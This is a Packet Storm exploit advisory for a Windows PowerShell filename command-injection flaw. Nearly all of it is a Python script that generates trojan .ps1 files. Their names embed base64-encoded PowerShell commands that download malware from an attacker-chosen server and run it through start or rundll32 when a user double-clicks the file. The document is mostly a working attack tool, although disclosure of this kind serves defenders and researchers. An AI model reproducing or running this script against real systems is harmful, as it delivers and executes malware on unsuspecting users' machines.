Microsoft Windows PowerShell Remote Command Execution

Reported by hyp3rlinx, hyp3rlinx.altervista.org, 08 Jun 2023. Type: packetstorm (source: packetstormsecurity.com).

Code

```python
from base64 import b64encode
import argparse,sys,os
#PSTrojanFile.py
#By hyp3rlinx (c) 2023
#ApparitionSec
#hyp3rlinx.altervista.org
#twitter.com/hyp3rlinx
#twitter.com/malvuln
#PoC Video: https://www.youtube.com/watch?v=-ZJnA70Cf4I
#============================================================================================
#Create vulnerable Windows .PS1 (PowerShell) files with specially crafted exploitable names.
#Example:
#Test;POweRsHeLL -e [BASE64 PAYLOAD];.ps1
#Testing;saps (gc -)PoC;.ps1
#
#Updated for Python3 from my original 2019 script with added DLL support and fixes.
#Creates malicious ".ps1" PowerShell files with embedded trojan filename commands.
#Download, save and execute malware (EXE,DLL) all from within a PowerShell Filename.
#Expects hostname/ip-address of web-server housing an executable.
#
#Vectors:
#Double-click, drag and drop to a PowerShell shortcut, command line.
#
#Requirements:
#=============
#1) .PS1 files set to open and run with PowerShell as the default program
#2) Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
#
#By hyp3rlinx - apparitionSec
#===========================================================================================
BANNER="""
_ \ ___| __ __| _) ____| _) |
| | \___ \ | __| _ \ | _` | __ \ | | | _ \
___/ | | | ( | | ( | | | __| | | __/
_| _____/ _| _| \___/ | \__,_| _| _| _| _| _| \___|
___/
By hyp3rlinx
(C) circa 2023
"""

#Console colors
RED="\033[1;31;40m"
GREY="\033[1;30;40m"
CYAN="\033[1;36;40m"
YELLOW="\033[1;33;40m"
ENDC = '\033[m' #Default

def parse_args():
    parser.add_argument("-i", "--ipaddress", help="Remote server hosting a Malware.")
    parser.add_argument("-m", "--local_malware_name", help="Name of the Malware on disk after download.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    parser.add_argument("-t", "--type", help="Executable type EXE or DLL (required)")
    parser.add_argument("-f", "--from_file", nargs="?", const="1", help="Execute commands from a local text-file named '-' (dash).")
    parser.add_argument("-u", "--usage", nargs="?", const="1", help="Usage examples.")
    return parser.parse_args()

def show_usage():
    print(RED+BANNER+ENDC)
    print(CYAN+"[+] "+GREY+"PSTrojanFile.py -i 127.0.0.1 -m hate.exe -r 1.exe -t exe")
    print(CYAN+"[+] "+GREY+"PSTrojanFile.py -i x.x.x.x -m q.z -r s.dll -t dll"+ENDC)


def main(args):
    PSEmbedFilenameMalwr=""
    if args.usage:
        show_usage()
        return
    if args.from_file: #Create PS1 file that executes code from a text-file using saps gc (get-content).
        if create_file("",1):
            success(1)
    if args.ipaddress:
        if not args.type:
            show_usage()
            print(YELLOW+"[!] "+GREY+"Provide the executable type DLL or EXE"+ENDC)
            exit(1)
        if args.type=="exe": #EXE saved to current dir where the vuln PS script is run.
            PSEmbedFilenameMalwr = "iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O "+args.local_malware_name+";sleep -s 2;start "+args.local_malware_name
        else: #DLL saved to users downloads directory.
            PSEmbedFilenameMalwr = "saps "+"http://"+args.ipaddress+"/"+args.remote_malware_name+";sleep -s2;rundll32 $HOME/Downloads/"+args.local_malware_name+", 0"
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')).decode()

def success(obj):
    print(RED+BANNER+ENDC)
    print(GREY+"[+] PS1 Trojan File Created!")
    if obj==1:
        print(GREY+"[+] Added 'calc.exe' command to created file named '-' (dash)"+ENDC)

def create_file(payload, local):
    if local==1:
        f=open("Testing;saps (gc -)PoC;.ps1", "w")
        f2=open("-", "w")
        f2.write("calc.exe")
        f2.close()
    else:
        f=open("Test;PoWeRShell -e "+payload+";2.ps1", "w")
        f.write("Write-Output 'Have a nice day GG!'")
    f.close()
    return True

if __name__=="__main__":
    os.system("color")
    parser = argparse.ArgumentParser()
    PSCmds = main(parse_args())

    if len(sys.argv)==1:
        print(RED+BANNER+GREY)
        parser.print_help(sys.stderr)
        print(ENDC)
        sys.exit(1)
    if PSCmds:
        if create_file(PSCmds,0):
            success(0)
```
